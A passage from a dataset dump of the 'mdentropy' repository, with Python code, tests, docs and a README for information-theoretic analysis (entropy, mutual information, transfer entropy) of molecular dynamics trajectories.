_changelog:\n\nChangelog\n=========\n\nv0.4 (Development)\n------------------\n\nv0.3\n----\n\nAPI Changes\n~~~~~~~~~~~\n- Added ``method`` option (gh-18).\n- Added contact and alpha angle ``metrics`` (gh-33).\n\nNew Features\n~~~~~~~~~~~~\n- Added KDE entropy estimation (gh-16).\n- Added adaptive partitioning (gh-20).\n- Added symbolic entropy (gh-30).\n- Added KNN entropy estimators (gh-40).\n- Change default to Grassberger (gh-45).\n\nImprovements\n~~~~~~~~~~~~\n- Massive reorganization and unit tests (gh-19).\n- Added tests for shuffling correction (gh-24).\n- Added dihedral option to scripts (gh-29).\n- Added more options to scripts (gh-31).\n- Improved code health (gh-41).\n- Added conda-build and CLI (gh-46).\n- KNN code speed up (gh-49).\n" }, { "alpha_fraction": 0.5270894765853882, "alphanum_fraction": 0.5459890961647034, "avg_line_length": 25.903955459594727, "blob_id": "83006fdb310a824e77817c335d3aea7c46be26fd", "content_id": "c4fededd1efa154ddcf11969fe6a1ad856bc73cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4762, "license_type": "permissive", "max_line_length": 75, "num_lines": 177, "path": "/mdentropy/core/entropy.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .binning import symbolic\nfrom ..utils import kde, nearest_distances\n\nfrom itertools import chain\n\nfrom numpy import ndarray\nfrom numpy import sum as npsum\nfrom numpy import (atleast_2d, arange, bincount, diff, finfo, float32,\n hsplit, log, nan_to_num, nansum, product, ravel, vstack)\n\nfrom scipy.stats import entropy as naive\nfrom scipy.special import psi\n\n__all__ = ['entropy', 'centropy']\nEPS = finfo(float32).eps\n\n\ndef entropy(n_bins, rng, method, *args):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n rng : list of lists\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n 
Method used to calculate entropy.\n args : numpy.ndarray, shape = (n_samples, ) or (n_samples, n_dims)\n Data of which to calculate entropy. Each array must have the same\n number of samples.\n\n Returns\n -------\n entropy : float\n \"\"\"\n args = [args] if isinstance(args, ndarray) else args\n args = list(chain(*[map(ravel, hsplit(arg, arg.shape[1]))\n if arg.ndim == 2\n else atleast_2d(arg)\n for arg in args]))\n\n if method == 'knn':\n return knn_entropy(*args, k=n_bins)\n\n if rng is None or None in rng:\n rng = len(args) * [None]\n\n for i, arg in enumerate(args):\n if rng[i] is None:\n rng[i] = (min(arg), max(arg))\n\n if method == 'kde':\n return kde_entropy(rng, *args, grid_size=n_bins or 20)\n\n counts = symbolic(n_bins, rng, *args)\n\n if method == 'chaowangjost':\n return chaowangjost(counts)\n elif method == 'grassberger':\n return grassberger(counts)\n\n return naive(counts)\n\n\ndef centropy(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Conditional entropy calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dims)\n Conditioned variable.\n y : array_like, shape = (n_samples, n_dims)\n Conditional variable.\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n return (entropy(n_bins, 2 * [rng], method, x, y) -\n entropy(n_bins, [rng], method, y))\n\n\ndef knn_entropy(*args, k=None):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n args : numpy.ndarray, shape = (n_samples, ) or (n_samples, n_dims)\n Data of which to calculate entropy. 
Each array must have the same\n number of samples.\n k : int\n Number of bins.\n\n Returns\n -------\n entropy : float\n \"\"\"\n data = vstack((args)).T\n n_samples, n_dims = data.shape\n k = k if k else max(3, int(n_samples * 0.01))\n\n nneighbor = nearest_distances(data, k=k)\n const = psi(n_samples) - psi(k) + n_dims * log(2.)\n\n return (const + n_dims * log(nneighbor).mean())\n\n\ndef kde_entropy(rng, *args, grid_size=20, **kwargs):\n \"\"\"Kernel Density Estimation of Entropy\"\"\"\n data = vstack((args)).T\n\n prob, space = kde(data, rng, grid_size=20, **kwargs)\n\n return -nansum(prob * log(prob)) * product(diff(space)[:, 0])\n\n\ndef grassberger(counts):\n \"\"\"Entropy calculation using Grassberger correction.\n doi:10.1016/0375-9601(88)90193-4\n\n Parameters\n ----------\n counts : list\n bin counts\n\n Returns\n -------\n entropy : float\n \"\"\"\n n_samples = npsum(counts)\n return npsum(counts * (log(n_samples) -\n nan_to_num(psi(counts)) -\n ((-1.) ** counts / (counts + 1.)))) / n_samples\n\n\ndef chaowangjost(counts):\n \"\"\"Entropy calculation using Chao, Wang, Jost correction.\n doi: 10.1111/2041-210X.12108\n\n Parameters\n ----------\n counts : list\n bin counts\n\n Returns\n -------\n entropy : float\n \"\"\"\n n_samples = npsum(counts)\n bcbc = bincount(counts.astype(int))\n if len(bcbc) < 3:\n return grassberger(counts)\n if bcbc[2] == 0:\n if bcbc[1] == 0:\n A = 1.\n else:\n A = 2. / ((n_samples - 1.) * (bcbc[1] - 1.) + 2.)\n else:\n A = 2. * bcbc[2] / ((n_samples - 1.) * (bcbc[1] - 1.) +\n 2. * bcbc[2])\n pr = arange(1, int(n_samples))\n pr = 1. / pr * (1. 
- A) ** pr\n entropy = npsum(counts / n_samples * (psi(n_samples) -\n nan_to_num(psi(counts))))\n\n if bcbc[1] > 0 and A != 1.:\n entropy += nan_to_num(bcbc[1] / n_samples *\n (1 - A) ** (1 - n_samples *\n (-log(A) - npsum(pr))))\n return entropy\n" }, { "alpha_fraction": 0.5844943523406982, "alphanum_fraction": 0.5934831500053406, "avg_line_length": 25.969696044921875, "blob_id": "c181ded1f7b96d7ac1510a7a94e8ee92d418c5e5", "content_id": "237d47e1167889ca1743315f5f4840b8bfd92071", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4450, "license_type": "permissive", "max_line_length": 76, "num_lines": 165, "path": "/mdentropy/utils.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from __future__ import print_function\n\nimport time\nfrom glob import glob\nfrom itertools import chain\n\nfrom numpy import (dtype, exp, finfo, float32, isscalar, linspace, log,\n meshgrid, nan_to_num, pi, random, ravel, unique, void,\n vstack)\nfrom numpy.linalg import det\n\nfrom sklearn.neighbors import KernelDensity, NearestNeighbors, BallTree\nfrom scipy.special import digamma, gamma\n\n\n__all__ = ['floor_threshold', 'parse_files', 'shuffle', 'Timing',\n 'unique_row_count', 'kde', 'nearest_distances', 'avgdigamma',\n 'volume_unit_ball']\nEPS = finfo(float32).eps\n\n\nclass Timing(object):\n \"Context manager for printing performance\"\n def __init__(self, iteration, verbose=False):\n self.iteration = iteration\n self.start = None\n self.verbose = verbose\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, ty, val, tb):\n end = time.time()\n if self.verbose:\n print(\"Round %d : %0.3f seconds\" %\n (self.iteration, end - self.start))\n return False\n\n\ndef parse_files(expr):\n expr = expr.replace(' ', '').split(',')\n return list(chain(*map(glob, expr)))\n\n\ndef shuffle(df, n=1):\n \"\"\"Convenience function for shuffling values in DataFrame objects\n\n Parameters\n 
----------\n df : pandas.DataFrame\n pandas DataFrame\n n : int\n Number of shuffling iterations.\n Returns\n -------\n sdf : array_like, shape = (n_bins, )\n shuffled DataFrame\n \"\"\"\n sdf = df.copy()\n sampler = random.permutation\n for _ in range(n):\n sdf = sdf.apply(sampler, axis=0)\n sdf = sdf.apply(sampler, axis=1)\n return sdf\n\n\ndef unique_row_count(arr):\n \"\"\"Convenience function for counting unique rows in a numpy.ndarray\n\n Parameters\n ----------\n arr : numpy.ndarray\n Returns\n -------\n counts : array_like, shape = (n_bins, )\n unique row counts\n \"\"\"\n _, counts = unique(arr.view(dtype((void, arr.dtype.itemsize *\n arr.shape[1]))), return_counts=True)\n return counts\n\n\ndef floor_threshold(arr, threshold=0.):\n \"\"\"Convenience funtion for thresholding to a lower bound\n\n Parameters\n ----------\n arr : numpy.ndarray\n Returns\n -------\n new_arr : numpy.ndarray\n thresholded array\n \"\"\"\n new_arr = nan_to_num(arr.copy())\n new_arr[arr < threshold] = threshold\n return new_arr\n\n\ndef entropy_gaussian(C):\n '''\n Entropy of a gaussian variable with covariance matrix C\n '''\n if isscalar(C):\n return .5 * (1 + log(2 * pi)) + .5 * log(C)\n else:\n n = C.shape[0]\n return .5 * n * (1 + log(2 * pi)) + .5 * log(abs(det(C)))\n\n\ndef kde(data, rng, grid_size=10, **kwargs):\n \"\"\"Kernel Density Estimation with Scikit-learn\"\"\"\n n_samples = data.shape[0]\n n_dims = data.shape[1]\n\n bandwidth = (n_samples * (n_dims + 2) / 4.)**(-1. 
/ (n_dims + 4.))\n kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n kde_skl.fit(data)\n\n space = [linspace(i[0], i[1], grid_size) for i in rng]\n grid = meshgrid(*tuple(space))\n\n # score_samples() returns the log-likelihood of the samples\n log_pdf = kde_skl.score_samples(vstack(map(ravel, grid)).T)\n return exp(log_pdf), space\n\n\ndef nearest_distances(X, k=1, leaf_size=16):\n '''\n X = array(N,M)\n N = number of points\n M = number of dimensions\n returns the distance to the kth nearest neighbor for every point in X\n '''\n # small amount of noise to break degeneracy.\n X += EPS * random.rand(*X.shape)\n\n knn = NearestNeighbors(n_neighbors=k + 1, leaf_size=leaf_size,\n p=float('inf'))\n knn.fit(X)\n d, _ = knn.kneighbors(X) # the first nearest neighbor is itself\n return d[:, -1]\n\n\ndef avgdigamma(data, dvec, leaf_size=16):\n \"\"\"Convenience function for finding expectation value of <psi(nx)> given\n some number of neighbors in some radius in a marginal space.\n\n Parameters\n ----------\n points : numpy.ndarray\n dvec : array_like (n_points,)\n Returns\n -------\n avgdigamma : float\n expectation value of <psi(nx)>\n \"\"\"\n tree = BallTree(data, leaf_size=leaf_size, p=float('inf'))\n\n n_points = tree.query_radius(data, dvec - EPS, count_only=True)\n\n return digamma(n_points).mean()\n\n\ndef volume_unit_ball(n_dims):\n return (pi ** (.5 * n_dims)) / gamma(.5 * n_dims + 1)\n" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 22.912281036376953, "blob_id": "eb1bd1c08f8b5ab62eff56b8b0c80100d12afcec", "content_id": "ed58e6f76f04bcb0dbc20d0d8272498094d28df1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1363, "license_type": "permissive", "max_line_length": 89, "num_lines": 57, "path": "/docs/index.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "MDEntropy\n=========\n\nMDEntropy is a 
python library that allows users to perform information-theoretic\nanalyses on molecular dynamics (MD) trajectories. It includes methods to\ncalculate:\n\n- Bias-Corrected Entropy\n- Conditional Entropy\n- Mutual Information\n- Normalized Mutual Information\n- Conditional Mutual Information\n- Normalized Conditional Mutual Information\n\n\nMDEntropy is actively being developed by researchers at Stanford University, with primary\napplication areas in computational protein dynamics and drug design, and distributed\nunder the `MIT License <https://tldrlegal.com/l/mit>`_.\nAll development takes place on `GitHub <https://github.com/msmbuilder/mdentropy>`_.\n\nTo cite MDEntropy, please use the following reference:\n\n.. code:: bibtex\n\n @article{mdentropy,\n author = {Carlos X. Hern{\\'{a}}ndez and Vijay S. Pande},\n title = {{MDEntropy: Information-Theoretic Analyses for Molecular Dynamics}},\n month = nov,\n year = 2017,\n doi = {10.21105/joss.00427},\n url = {https://doi.org/10.21105/joss.00427}\n }\n\n.. raw:: html\n\n <div style=\"display:none\">\n\n.. toctree::\n :maxdepth: 2\n\n installation\n examples/index\n api\n contributing\n publications\n changelog\n\n.. raw:: html\n\n </div>\n\n.. Indices and tables\n.. ==================\n..\n.. * :ref:`genindex`\n.. * :ref:`modindex`\n.. * :ref:`search`\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 17, "blob_id": "1f8123581cdd09011150d97768fe572b52ca919e", "content_id": "00f2124cc84b1657f24d9ebb5ec9241c4cdbe412", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 72, "license_type": "permissive", "max_line_length": 32, "num_lines": 4, "path": "/docs/examples/mutual-information.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "Mutual Information\n==================\n\n.. 
notebook:: mutual-information\n" }, { "alpha_fraction": 0.6840981841087341, "alphanum_fraction": 0.6840981841087341, "avg_line_length": 17.739999771118164, "blob_id": "be5f12adf1ab6041d84a99897a3d14b0cb25b3c7", "content_id": "e48c81ed338ba82768cea9a0b8212f524f23ecf5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 937, "license_type": "permissive", "max_line_length": 49, "num_lines": 50, "path": "/docs/api.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. _api_ref:\n\n.. currentmodule:: mdentropy\n\n\nAPI reference\n=============\n\nBinning Functions\n-----------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.core.binning.doanes_rule\n mdentropy.core.binning.hist\n mdentropy.core.binning.symbolic\n\nEntropy Calculations\n--------------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.entropy\n mdentropy.centropy\n\nInformation Calculations\n------------------------\n\n.. autosummary::\n :toctree: generated/\n\n mdentropy.mutinf\n mdentropy.nmutinf\n mdentropy.cmutinf\n mdentropy.ncmutinf\n\nFeature Metrics\n---------------\n\n.. 
autosummary::\n :toctree: generated/\n\n mdentropy.metrics.AlphaAngleMutualInformation\n mdentropy.metrics.AlphaAngleTransferEntropy\n mdentropy.metrics.ContactMutualInformation\n mdentropy.metrics.ContactTransferEntropy\n mdentropy.metrics.DihedralMutualInformation\n mdentropy.metrics.DihedralTransferEntropy\n" }, { "alpha_fraction": 0.5780290961265564, "alphanum_fraction": 0.6213247179985046, "avg_line_length": 26.625, "blob_id": "40f9903b5be7a6285403cd240e0dd553991b8473", "content_id": "34d080a90fbd4f28c657192c6523ddafbdc2009a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3095, "license_type": "permissive", "max_line_length": 79, "num_lines": 112, "path": "/mdentropy/tests/test_cmutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "\nfrom ..utils import entropy_gaussian\nfrom ..core import cmutinf, centropy, ncmutinf\nfrom ..metrics import (AlphaAngleTransferEntropy, ContactTransferEntropy,\n DihedralTransferEntropy)\n\nfrom msmbuilder.example_datasets import FsPeptide\n\nimport numpy as np\nfrom numpy.testing import assert_almost_equal as eq, assert_allclose as close\n\nrs = np.random.RandomState(42)\nn, d = 50000, 3\n\nP = np.array([[1, .5, .25], [.5, 1, 0], [.25, 0, 1]])\nCOV = np.dot(P, P.T)\nY = rs.randn(d, n)\na, b, c = np.dot(P, Y)\na, b, c = np.atleast_2d(a).T, np.atleast_2d(b).T, np.atleast_2d(c).T\n\ntrue_cmutinf = (entropy_gaussian(COV[[[0, 0], [0, 2]], [[0, 2], [2, 2]]]) +\n entropy_gaussian(COV[[[1, 1], [1, 2]], [[1, 2], [2, 2]]]) -\n entropy_gaussian(COV) - entropy_gaussian(COV[2, 2]))\ntrue_cond_ent = (entropy_gaussian(COV[[[0, 0], [0, 2]], [[0, 2], [2, 2]]]) -\n entropy_gaussian(COV[2, 2]))\n\nTRUE_NCMUTINF = true_cmutinf / true_cond_ent\n\n\ndef test_ncmutinf_kde():\n close(ncmutinf(3, a, b, c, method='kde'), TRUE_NCMUTINF, atol=.05, rtol=.2)\n\n\ndef test_ncmutinf_knn():\n close(ncmutinf(3, a, b, c, method='knn'), TRUE_NCMUTINF, atol=.05, 
rtol=.2)\n\n\ndef test_ncmutinf_chaowangjost():\n close(ncmutinf(8, a, b, c, method='chaowangjost'), TRUE_NCMUTINF, atol=.05,\n rtol=.2)\n\n\ndef test_ncmutinf_grassberger():\n close(ncmutinf(8, a, b, c, method='grassberger'), TRUE_NCMUTINF, atol=.05,\n rtol=.2)\n\n\ndef test_ncmutinf_doanes_rule():\n close(ncmutinf(None, a, b, c, method='grassberger'), TRUE_NCMUTINF,\n atol=.05, rtol=.4)\n\n\ndef test_ncmutinf_naive():\n close(ncmutinf(8, a, b, c, method=None), TRUE_NCMUTINF, atol=.05, rtol=.2)\n\n\ndef test_ncmutinf():\n a = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n b = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n c = rs.uniform(low=0, high=360, size=1000).reshape(-1, 1)\n\n NCMI_REF = (cmutinf(10, a, b, c) /\n centropy(10, a, c))\n NCMI = ncmutinf(10, a, b, c)\n\n eq(NCMI, NCMI_REF, 5)\n\n\ndef test_fs_tent():\n\n traj1, traj2 = FsPeptide().get().trajectories[:2]\n\n idx = [at.index for at in traj1.topology.atoms\n if at.residue.index in [3, 4, 5, 6, 7, 8]]\n\n traj1 = traj1.atom_slice(atom_indices=idx)[::100]\n traj2 = traj2.atom_slice(atom_indices=idx)[::100]\n\n traj = (traj1, traj2)\n\n yield _test_tent_alpha, traj\n yield _test_tent_contact, traj\n yield _test_tent_dihedral, traj\n\n\ndef _test_tent_alpha(traj):\n tent = AlphaAngleTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n\n\ndef _test_tent_contact(traj):\n tent = ContactTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n\n\ndef _test_tent_dihedral(traj):\n tent = DihedralTransferEntropy()\n T = tent.partial_transform(traj)\n\n assert T is not None\n _test_tent_shuffle(tent, traj)\n\n\ndef _test_tent_shuffle(tent, traj):\n T = tent.partial_transform(traj, shuffle=0)\n TS = tent.partial_transform(traj, shuffle=1)\n\n assert T is not None\n assert TS is not None\n" }, { "alpha_fraction": 0.5446873903274536, "alphanum_fraction": 0.5492903590202332, "avg_line_length": 40.380950927734375, "blob_id": 
"cffb63ca5ea3192c3e9ac76eb95192cd6540c44e", "content_id": "27533dbe16621f6bd46fb30b0514a1a0cadd00a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2607, "license_type": "permissive", "max_line_length": 78, "num_lines": 63, "path": "/mdentropy/cli/dtent.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python\n\nfrom argparse import ArgumentDefaultsHelpFormatter\n\n\ndef func(args, parser):\n # delay import of the rest of the module to improve `mdentropy -h`\n # performance\n import pickle\n import mdtraj as md\n import pandas as pd\n from ..utils import parse_files\n from ..metrics import DihedralTransferEntropy\n\n f1, f2 = parse_files(args.current), parse_files(args.past)\n\n current = md.load(f1, top=args.top, stride=args.stride)\n past = md.load(f2, top=args.top, stride=args.stride)\n\n tent = DihedralTransferEntropy(n_bins=args.nbins, types=args.types,\n method=args.method, threads=args.n_threads,\n normed=True)\n\n T = tent.partial_transform((past, current), shuffle=iter, verbose=True)\n\n df = pd.DataFrame(T, columns=tent.labels)\n\n pickle.dump(df, open(args.out, 'wb'))\n\n\ndef configure_parser(sub_parsers):\n help = 'Run a dihedral transfer entropy calculation'\n p = sub_parsers.add_parser('dtent', description=help, help=help,\n formatter_class=ArgumentDefaultsHelpFormatter)\n p.add_argument('-p', '--past', dest='past',\n help='File containing past step states.',\n required=True)\n p.add_argument('-s', '--shuffle-iter', dest='iter',\n help='Number of shuffle iterations.',\n default=10, type=int)\n p.add_argument('-r', '--stride', dest='stride',\n help='Stride to use', default=1, type=int)\n p.add_argument('-t', '--topology',\n dest='top', help='File containing topology.',\n default=None)\n p.add_argument('-b', '--n-bins', dest='nbins',\n help='Number of bins', default=3, type=int)\n p.add_argument('-n', '--n-threads', dest='N',\n help='Number of 
threads', default=None, type=int)\n p.add_argument('-o', '--output', dest='out',\n help='Name of output file.', default='tent.pkl')\n p.add_argument('-m', '--method', dest='method',\n help='Entropy estimate method.',\n choices=['chaowangjost', 'grassberger', 'kde',\n 'knn', 'naive'],\n default='knn')\n p.add_argument('-d', '--dihedrals', dest='dihedrals',\n help='Dihedral angles to analyze.',\n nargs='+',\n choices=['phi', 'psi', 'omega', 'chi1',\n 'chi2', 'chi3', 'chi4'],\n default=['phi', 'psi'])\n p.set_defaults(func=func)\n" }, { "alpha_fraction": 0.6166666746139526, "alphanum_fraction": 0.6489583253860474, "avg_line_length": 23.615385055541992, "blob_id": "3762a67ae01eb83e3207ece2585cbf70eaaf6aa8", "content_id": "ed16b9fc46ac0404f01639ba26c48e4d4a369103", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 960, "license_type": "permissive", "max_line_length": 79, "num_lines": 39, "path": "/mdentropy/tests/test_entropy.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import entropy_gaussian\nfrom ..core import entropy\n\nimport numpy as np\nfrom numpy.testing import assert_allclose as close\n\nrs = np.random.RandomState(42)\nn, d = 50000, 3\nP = np.array([[1, 0, 0], [0, 1, .5], [0, 0, 1]])\nCOV = np.dot(P, P.T)\nY = rs.randn(d, n)\nX = np.dot(P, Y).T\n\nTRUE_ENTROPY = entropy_gaussian(COV)\nRNG = list(zip(*(X.min(axis=0), X.max(axis=0))))\n\n\ndef test_entropy_kde():\n close(entropy(8, RNG, 'kde', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_knn():\n close(entropy(3, [None], 'knn', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_chaowangjost():\n close(entropy(8, RNG, 'chaowangjost', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_grassberger():\n close(entropy(8, RNG, 'grassberger', X), TRUE_ENTROPY, rtol=.2)\n\n\ndef test_entropy_doanes_rule():\n close(entropy(None, RNG, 'grassberger', X), TRUE_ENTROPY, atol=2., rtol=.2)\n\n\ndef 
test_entropy_naive():\n close(entropy(8, RNG, None, X), TRUE_ENTROPY, rtol=.2)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 24, "blob_id": "484b6f685b45721f3f11e7ccc4961aa5ee12b0ca", "content_id": "4a6460b51b38a154882d351d6a61d86d961cdc02", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "permissive", "max_line_length": 26, "num_lines": 2, "path": "/mdentropy/core/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .entropy import *\nfrom .information import *\n" }, { "alpha_fraction": 0.6022409200668335, "alphanum_fraction": 0.6054421663284302, "avg_line_length": 30.237499237060547, "blob_id": "9c81d6b6507f4a2337aab693224dda01e506acad", "content_id": "d2ebb63f06756495ed65aea9e0a6f41573bf7e20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2499, "license_type": "permissive", "max_line_length": 79, "num_lines": 80, "path": "/mdentropy/metrics/tent.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..core import cmutinf, ncmutinf\nfrom .base import (AlphaAngleBaseMetric, ContactBaseMetric, DihedralBaseMetric,\n BaseMetric)\n\n\nimport numpy as np\nfrom itertools import product\n\nfrom multiprocessing import Pool\nfrom contextlib import closing\n\n__all__ = ['AlphaAngleTransferEntropy', 'ContactTransferEntropy',\n 'DihedralTransferEntropy']\n\n\nclass TransferEntropyBase(BaseMetric):\n\n \"\"\"Base transfer entropy object\"\"\"\n\n def _partial_tent(self, p):\n i, j = p\n\n return self._est(self.n_bins,\n self.data[j].values,\n self.shuffled_data[i].values,\n self.shuffled_data[j].values,\n rng=self.rng,\n method=self.method)\n\n def _exec(self):\n with closing(Pool(processes=self.n_threads)) as pool:\n CMI = list(pool.map(self._partial_tent,\n product(self.labels, self.labels)))\n 
pool.terminate()\n\n return np.reshape(CMI, (self.labels.size, self.labels.size)).T\n\n def _before_exec(self, traj):\n traj1, traj2 = traj\n self.data = self._extract_data(traj2)\n self.shuffled_data = self._extract_data(traj1)\n self.labels = np.unique(self.data.columns.levels[0])\n\n def __init__(self, normed=True, **kwargs):\n self._est = ncmutinf if normed else cmutinf\n self.partial_transform.__func__.__doc__ = \"\"\"\n Partial transform a mdtraj.Trajectory into an n_residue by n_residue\n matrix of transfer entropy scores.\n\n Parameters\n ----------\n traj : tuple\n Pair of trajectories to transform (state0, state1)\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray, shape = (n_residue, n_residue)\n Transfer entropy matrix\n \"\"\"\n\n super(TransferEntropyBase, self).__init__(**kwargs)\n\n\nclass AlphaAngleTransferEntropy(AlphaAngleBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for alpha angles\"\"\"\n\n\nclass ContactTransferEntropy(ContactBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for contacts\"\"\"\n\n\nclass DihedralTransferEntropy(DihedralBaseMetric, TransferEntropyBase):\n\n \"\"\"Transfer entropy calculations for dihedral angles\"\"\"\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 7, "blob_id": "357caf93dd08999dedd27e9a77074cd269bb2671", "content_id": "54ae6be1bcf7e5356e995404b9a2d152e4b2598d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 48, "license_type": "permissive", "max_line_length": 10, "num_lines": 6, "path": "/requirements.txt", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "numpy\nscipy\npandas\nmsmbuilder\nmdtraj\nmsmbuilder\n" }, { "alpha_fraction": 0.686656653881073, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 36.05555725097656, "blob_id": 
"d680f5ae90bbddee2b4391b4b42f50adc19c88bd", "content_id": "92662a192dcf055ca528a7565235e97ba3870e07", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2001, "license_type": "permissive", "max_line_length": 155, "num_lines": 54, "path": "/README.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "[![Build Status](https://travis-ci.org/msmbuilder/mdentropy.svg?branch=master)](https://travis-ci.org/msmbuilder/mdentropy)\n[![Code Health](https://landscape.io/github/msmbuilder/mdentropy/master/landscape.svg?style=flat)](https://landscape.io/github/msmbuilder/mdentropy/master)\n[![PyPI version](https://badge.fury.io/py/mdentropy.svg)](http://badge.fury.io/py/mdentropy)\n[![License](https://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://opensource.org/licenses/MIT)\n[![Documentation](https://img.shields.io/badge/docs-latest-blue.svg?style=flat)](http://msmbuilder.org/mdentropy/)\n[![DOI](http://joss.theoj.org/papers/10.21105/joss.00427/status.svg)](https://doi.org/10.21105/joss.00427)\n\n\nMDEntropy\n=========\n\nMDEntropy is a python library that allows users to perform information-theoretic\nanalyses on molecular dynamics (MD) trajectories. 
It includes methods to\ncalculate:\n\n+ Bias-Corrected Entropy\n+ Conditional Entropy\n+ Mutual Information\n+ Normalized Mutual Information\n+ Conditional Mutual Information\n+ Normalized Conditional Mutual Information\n\n\n## Documentation\n\nFull documentation can be found at [http://msmbuilder.org/mdentropy/](http://msmbuilder.org/mdentropy/).\nFor information about installation, please refer to our [Installation](http://msmbuilder.org/mdentropy/0.3.0/installation.html) page.\n\nWe also have [example notebooks](http://msmbuilder.org/mdentropy/0.3.0/examples/index.html) with common use cases for MDEntropy.\nPlease feel free to add your own as a pull-request!\n\n## Requirements\n\n+ `python`>=3.4\n+ `numpy`>=1.10.4\n+ `scipy`>=0.17.0\n+ `scikit-learn`>=0.17.0\n+ `msmbuilder`>=3.5.0\n+ `nose` (optional, for testing)\n\n## Citing\n\nPlease cite:\n\n```bibtex\n@article{mdentropy,\n author = {Carlos X. Hern{\\'{a}}ndez and Vijay S. Pande},\n title = {{MDEntropy: Information-Theoretic Analyses for Molecular Dynamics}},\n month = nov,\n year = 2017,\n doi = {10.21105/joss.00427},\n url = {https://doi.org/10.21105/joss.00427}\n}\n```\n" }, { "alpha_fraction": 0.5625303983688354, "alphanum_fraction": 0.5751824975013733, "avg_line_length": 23.464284896850586, "blob_id": "7409a93e30369989c4ce790161d368801bfb9ef3", "content_id": "34345a54d5bfdc2dc09994ef452f4bc84e3756fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2055, "license_type": "permissive", "max_line_length": 86, "num_lines": 84, "path": "/mdentropy/core/binning.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import unique_row_count\n\nfrom numpy import (array, atleast_1d, digitize, empty, floor, linspace, log2,\n histogramdd, hstack, ndarray, sqrt, vstack)\nfrom scipy.stats import skew\n\n__all__ = ['hist', 'symbolic', 'doanes_rule']\n\n\ndef doanes_rule(x):\n \"\"\"Convenience function for choosing an 
